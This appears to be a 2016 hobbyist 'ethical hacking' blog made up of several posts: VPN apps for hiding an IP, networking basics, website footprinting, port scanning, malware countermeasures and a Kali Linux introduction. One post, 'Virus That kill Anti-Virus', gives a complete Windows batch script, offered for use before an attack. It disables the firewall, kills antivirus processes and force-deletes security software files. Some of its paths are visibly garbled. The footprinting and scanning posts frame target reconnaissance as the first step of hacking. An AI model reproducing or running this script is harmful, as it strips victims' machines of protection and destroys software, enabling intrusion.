Tuesday, 31 May 2016

How to Hide IP Address in Android

How to Hide IP Address in Android 

Hello Friends, Today I am Going to show you How to Hide IP Address in Android . We should Hide Our IP address for some Security reasons like :-


  • For Hiding Geographical Location.
  • To Prevent Web Tracking.
  • To avoid Leaving a Digital Footprint.
  • To Bypass Blocked Sites on their IP Address.
This Tutorials Is only for Educational Purpose. I will not Responsible any Damage done to your Android Handset

Introduction


Internet has Become so common these days that most of the people take it for granted. While everyone spends hours on internet, only a few online seems to care about their security When they are Online. Cyber Security has become one of the burning issues in this decade and your security is always in your hand. The small measure we take towards secure browsing will have a huge impact. using strong password, Hiding your IP address are some of the security measure you can follow, while the first one is self explanatory in this article I will show you how you can hide your IP address in your PC and Smartphone 



What Is IP address ?

An Internet Protocol address (IP address) is a numerical label assigned to each device (Computer, Printer) participating in a computer network that uses the Internet Protocol for communication. An IP address serves two principal functions: host or network interface identification and location addressing. Its role has been characterized as follows: "A name indicates what we seek. An address indicates where it is. A route indicates how to get there."

Why you should Hide IP Address ?

You may have your own reasons for hiding your IP Address, but here are a few technical reasons why people hide their public IP Address.

Hiding your IP Address is a good step in Protecting Yourself Online. I don't Want you to think it's Useless, But it's Certainly not the definitive measure that keeps your Online status Anonymous or Protected. 

We should Hide Our IP address for some Security reasons like :-
  • For Hiding Geographical Location.
  • To Prevent Web Tracking.
  • To avoid Leaving a Digital Footprint.
  • To Bypass Blocked Sites on their IP Address.

The only true way to remain anonymous online is to not even connect to the internet. :)

How to Hide IP Address In Android ?

The most Comman way to hide IP and Safe guard your Online identity in an android device is to download and install any VPN app from the Google Play Store. Some of the best VPN application that you can use are given below.
  • Hostspot shield Free VPN Proxy.
  • TunnelBear VPN 
  • Hideman VPN 
  • Tigervpns Free VPN and Proxy.
  • Free & Premium VPN - Finch VPN
  • Betternet Unlimited Free VPN

Friday, 27 May 2016

Basics OF Networking

Basics OF Networking 


What is Network ?

A computer Network or data Network is a Telecommunications Work which allows computers to exchange data. In computer networks, networked computing devices exchange data with each other using a data link. The connections between nodes are established using either cable media or wireless media.

  • Interconnection of two or more devices is called as a Network.
  • The Communication between two or more interconnected devices is called networking.
  • An internetwork is a connection of two or more network.
  • Internetworking means communication between different networks.

Types of Network ?

  • LAN-  Local Area Networks are used to connect networking devices that are in a very close geographic area such as a floor of a building, a building itself or with in a campus.
  • MAN- Metropolitan Area Network are used to connect networking devices that may span around the entire city.
  • WAN- Wide area networks which connects two or more LANs present at different geographical locations.

LAN Network

Man Network


WAN Network

Basic Requirements to Form a Network.

  • NIC ( Network Interface Card ) also called as LAN card.
  • Media 
  • Networking device like ( Hub,Switch,Router etc. )
  • Protocols 
  • Logical Address ( IP Address )

NIC(Network Interface Card)

  • NIC is the interface between the computer and the network.
  • It is also known as the LAN card or Ethernet Card.
  • Ethernet Card have a unique 48 bit address called as MAC (Media access Control) Address. MAC Address is also called as physical address or hardware address. The 48bit MAC address is represented as 12 Hexa-decimal digits. Example :0 0 1 6.D 3 F C. 6 0 3 F
  • Network card are available in Different Speed.
  • Ethernet ( 10 Mbps)
  • Fast Ethernet ( 100 Mbps)
  • Gigabit Ethernet (1000 Mbps)

Media

The purpose of media is to transport bits from one machine to another.

Media Is of 2 type:-
  • Guided 
  • Unguided

Guided media Is also of 3 types :-
  1. Co-axial 
  2. Twisted pair 
  3. Fiber
Unguided Media is of 2 types :-
  1. Infrared 
  2. RF

Types of twisted Pair Cables

Category                                DTR                       Purpose                          Connector

CAT1                                    1 Mbps                  Telephones                            RJ11
CAT2                                    4 Mbps                                                                RJ11
CAT3                                   10 Mbps                 Ethernet                                RJ45
CAT4                                   16 Mbps                                                               RJ45
CAT5                                   100 Mbps               Fast Ethernet                        RJ45
CAT5                                   500 Mbps                                                             RJ45
CAT6                                  1000 Mbps              Gigabit Ethernet                    RJ45

Topology

Topology is a physical layout of the system connected in a network.

Different types of Topology are:
  • Bus
  • Ring
  • Mesh
  • Star

Bus Topology

  • In bus topology all devices are connected to a single cable or backbone.
  • It support half duplex communication.
  • A break at any point along the backbone will result in total network Failure.
Ex:

Ring Topology

  • In Ring topology each computer or device is connected to its neighbor forming a Loop.
  • Failure of a single Device or a break anywhere in the cable cause the full network to stop communicating.
                                                                     Ex:

Mesh Topology

  • In mesh topology each device is directly connected to all other device.
  • The disadvantage is the number of NIC's required on each device and the complex cabling.
Ex:

Start Topology

  • The most commonly used topology.
  • It consist of one centralized device which can be either a switch or a hub.
  • The device connect to the various ports on the centralized devices.
Ex:

Networking Devices 

The various types of Networking Devices are:
  • Hub
  • Switch
  • Router

Hub / Repeater

  • It is not an Intelligent device.
  • It works with bits.
  • Uses broadcast for communication.
  • Bandwidth is shared.
  • Half-duplex communication.
Ex:

Switch

  • It is an Intelligent Device.
  • It maintains MAC address table ( Hardware address )
  • Each port of the switch has fixed bandwidth.
  • It works with flooding and Unicast
  • Supports full duplex communication. 
Ex:

Router

  • It is an Intelligent device.
  • It works with logical addressing (i.e IP, IPX, Apple Talk)
  • It work with Fixed bandwidth. 
Ex:
 If You Like My post Please Review My Blog In Comments .

________________________________Thank You ________________________________

Tuesday, 3 May 2016

How to Find Information of a Website

How to Find Information of a Website

Hello Friends, I am Mahak Bhawsar a Ethical Hacker. I am Back with some New Hacking Tutorials. In this post we are Going to Study How we can Find Information of Website. As u all knows that Foot printing is first step for a Hacker. Foot Printing mean gathering information of our target.



In this Tutorial we Gonna Find Information of Website like :-
  • Its Domain  
  • Its Name server 
  • IP of Server
  • IP of Name Server
  • Its Hosting Company
  • Its Domain Registrar
  • Which Web server they are using 
  • OS of Web server

Pre-requisite

Steps

1. Select the target Website & copy the Domain of the website. Ex www.microsoft.com 
2. Go the www.netcraft.com & paste the domain.


3. After Pasting Domain Click arrow & wait for Result. 
4. You will get Result like this




5. You will get some Information Through this Website & for some more Information we will use a tool called DNS Data View.
6. Download the tool from Internet and Install it.
7. Run the application as Administration.


8. When you start application you will see this Window.


9. Give the target Domain Ex zoomgroup.com & click OK.


10. Wait for some time you will get Result like this.

_________________Thank You_________________


How to Find Available Ports on a IP

How to Find Available Ports on a IP

Hello Friends, Today we are going to Find the Available pots On a IP. This is most important step for hacking a Web Server. After doing this we are able to see What services are On on a IP.


What are Ports ?

In programming, a port is a "logical connection place" and specifically, using the Internet's protocol, TCP/IP, the way a client program specifies a particular server program on a computer in a network.

A port is always associated with an IP address of a host and the protocol type of the communication and thus completes the destination or origination address of a communication session. A port is identified for each address and protocol by a 16-bit number, commonly known as the port number.

Specific port number are often used to identify specific services. Of the thousand of enumerated ports, 1024 well-known port number are reserved by convention to identify specific service type on a host. The protocol that primarily use ports are the transport layer protocol, such as the transmission Control Protocol (TCP) and the user Datagram prot (UDP) of the Internet protocol suite.

Pre-requisite


Steps :-

1. Select an Target IP which you want to Scan.
2. Download & Install Advance Port Scanner Tool.
3. Run Advance Port Scanner Tool as Administrator you will Find Tool in start menu after Installation.



4. After Opening Tool you will Get this Window. This Window is for Scanning range of IP's if you want to Scan only One IP Please Un-check Use range option.


5. After Un-checking Use range option you will get this Window.


6. Give the target IP & click on Scan Option to start Scanning.


7. It shows Scanning in bottom. We have to wait for some time.
8. After Scanning It shows Result like this.

If you like My Blog-Spot, My Tutorials Please give me your Feed Back as a Comment.
___________________Thank You___________________

Monday, 2 May 2016

Virus That kill Anti-Virus

Virus That kill Anti-Virus

Hello Friends, Today we are going to make a virus which will kill or disable the Anti-virus. This will be very Help full when we are going to attack prior attack we just have to execute the virus this will disable the Anti-virus & we have more chances for making our attack successful.

Warning

Please don't try to run this Virus on your computer it can harm your computer. I will not be Responsible for any damage done to your Computer. This virus is only for Education purpose. Please don't use it with wrong purpose.

What is Anti-Virus

Antivirus or anti-virus software, sometimes known as anti-malware software, is computer software used to prevent, detect and remove malicious software.
Antivirus software was originally developed to detect and remove computer viruses, hence the name. However, with the proliferation of other kinds of malware, antivirus software started to provide protection from other computer threats. In particular, modern antivirus software can protect from: malicious Browser Helper Objects (BHOs), browse, Virus, Trojan, Root Kits.

What id Killing Anti-virus ?

Killing Anti-virus mean Disabling the Anti-virus. Which mean after killing our antivirus will not run. and our computer is not protected.

Pre-requisite

  • Computer Installed with OS
  • Notepad

Steps to Create Virus

1. Go to the Start.
2. Open Notepad
3. Copy & paste the code given below.

____________CODE____________
@ echo off
rem —
rem RIP Anti Virus
net stop “Security Center”
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
cls
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
cls
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
cls
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*
cls
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
cls
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
cls
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmin
cls
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*
cls
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
cls
tskill /A offg*
del /Q /F C:\Program Files\alwils~1\avast4\*.*
del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe
del /Q /F C:\Program Files\kasper~1\*.exe
cls
del /Q /F C:\Program Files\trojan~1\*.exe
del /Q /F C:\Program Files\f-prot95\*.dll
del /Q /F C:\Program Files\tbav\*.dat
cls
del /Q /F C:\Program Files\avpersonal\*.vdf
del /Q /F C:\Program Files\Norton~1\*.cnt
del /Q /F C:\Program Files\Mcafee\*.*
cls
del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\*.*
del /Q /F C:\Program Files\Norton~1\*.*
cls
del /Q /F C:\Program Files\avgamsr\*.exe
del /Q /F C:\Program Files\avgamsvr\*.exe
del /Q /F C:\Program Files\avgemc\*.exe
cls
del /Q /F C:\Program Files\avgcc\*.exe
del /Q /F C:\Program Files\avgupsvc\*.exe
del /Q /F C:\Program Files\grisoft
del /Q /F C:\Program Files
ood32krn\*.exe
del /Q /F C:\Program Files
ood32\*.exe
cls
del /Q /F C:\Program Files
od32
del /Q /F C:\Program Files
ood32
del /Q /F C:\Program Files\kav\*.exe
del /Q /F C:\Program Files\kavmm\*.exe
del /Q /F C:\Program Files\kaspersky\*.*
cls
del /Q /F C:\Program Files\ewidoctrl\*.exe
del /Q /F C:\Program Files\guard\*.exe
del /Q /F C:\Program Files\ewido\*.exe
cls
del /Q /F C:\Program Files\pavprsrv\*.exe
del /Q /F C:\Program Files\pavprot\*.exe
del /Q /F C:\Program Files\avengine\*.exe
cls
del /Q /F C:\Program Files\apvxdwin\*.exe
del /Q /F C:\Program Files\webproxy\*.exe
del /Q /F C:\Program Files\panda software\*.*
rem —
____________________________________________

5. Save the File with ".bat" Extension.
6. Now your Virus is ready to use.


[NOTE] Please don't try to run this Virus on your computer it can harm your computer. I will not be Responsible for any damage done to your Computer. This virus is only for Education purpose. Please don't use it with wrong purpose.

___________________________________Thank You___________________________________

Sunday, 1 May 2016

Countermeasure Technique For Malware

Countermeasure Technique For Malware

Hello Friends, Today We are going to Study the Countermeasure technique for Malware. How can we protect our Computer from Malware. What Countermeasure Techniques we need to Protect our self.

It is always a cat and mouse game between malicious hackers hackers and security administrators. The one who is netter equipped has a greater chance of winning.

This post deals with some of the tools are absolutely necessary protect host in risky environments.



Anti-Virus

We all know this - antivirus is essential. Antivirus software installed on a client scans all the local files to check for virus infections. The antivirus has a database of all known virus which will be used to determine the virus infections on the device

Anti-Worm

Anti-worm is a software that can installed on a client device which scans all the local files to check for worm infection . This too relies on a database of known worms to find out infection.

Anti-Trojan

Anti-Trojan software scans all the local files to check for Trojans. Trojans are hidden programs which latch on to legitimate programs.

These Trojans can be detected by the Anti-Trojan software which maintains a database of all known Trojans.

Internet Security Suit

Internet security suit is an application that inspects a device (Laptop, Desktop, Mobile, Tablet) for different kinds of malware like Viruses, Worms, Trojans, Adware etc. Different vendors also include a personal firewall in the suit which can be used to control the traffic flow to and the device and also to control which application can get network access.

Host-based Intrusion detection system

A host-based intrusion detection system (HIDS) is an intrusion detection system that monitors and analyses the network of a computing system as well as (in some cases) the network packets on its network interfaces. A host-based IDS monitors all or parts of the dynamic behaviour and the state of a computer system A. HIDS might look at the state of a system, Its stored information whether in RAM in the file system, log files or else where and check that contents of these appear as expected.

Host Based Intrusion Prevention System

A host based intrusion prevention system (HIPS) is an intrusion prevention system that monitors and analyses the internals of a computing system as well as (in some cases) the network packets on its network interface for any malicious traffic or attacks targeted to the host and attempts to block it.

KALI Linux

KALI Linux

Hello Friends, Today we are going to Study KALI Linux. KALI Linux is very important to become a Good hacker. Kali Linux is widely used by Hacker to Hack device.


What is KALI Linux ?

KALI Linux is a Debian based distribution specifically Designed foe Penetration testing and Digital Forensics. KALI Linux is an update distribution of the ever popular Backtrack Linux Distribution. It is developed by Offensive security and contains useful tool useful for penetration testing.

How is KALI Linux is different from other Distribution ?

KALI Linux is a specialized Linux Distribution designed for penetration testing and most of the tools in KALI Linux requires running them as "root". Installing and running application as a root user is not recommended as there is a serious security threat if the user isn't aware of what activities are being performed.

What are the use of KALI Linux ?

Kali Linux can be used to perform penetration testing on a network or a host or can also br used by hackers to launch attacks on vulnerable host.

What is Metasploit Framework ?

Metasploit Framework is an open source tool used to develop and execute exploit on a vulnerable host. It was initially written by HD MOORE in the year 2003 using Perl. In 2007 it was re-written using Ruby.

Metasploit Framework can be used to identify vulnerabilities and exploit vulnerable hosts. Metasploit Framework contains over 500 exploits for window, Linux, Unix, Mac, OS, Android etc.

Metasploit Frame work can be used via the command line interface. There is also an application called 'Amritage' that can be used as a Graphical User Interface for Metasploit.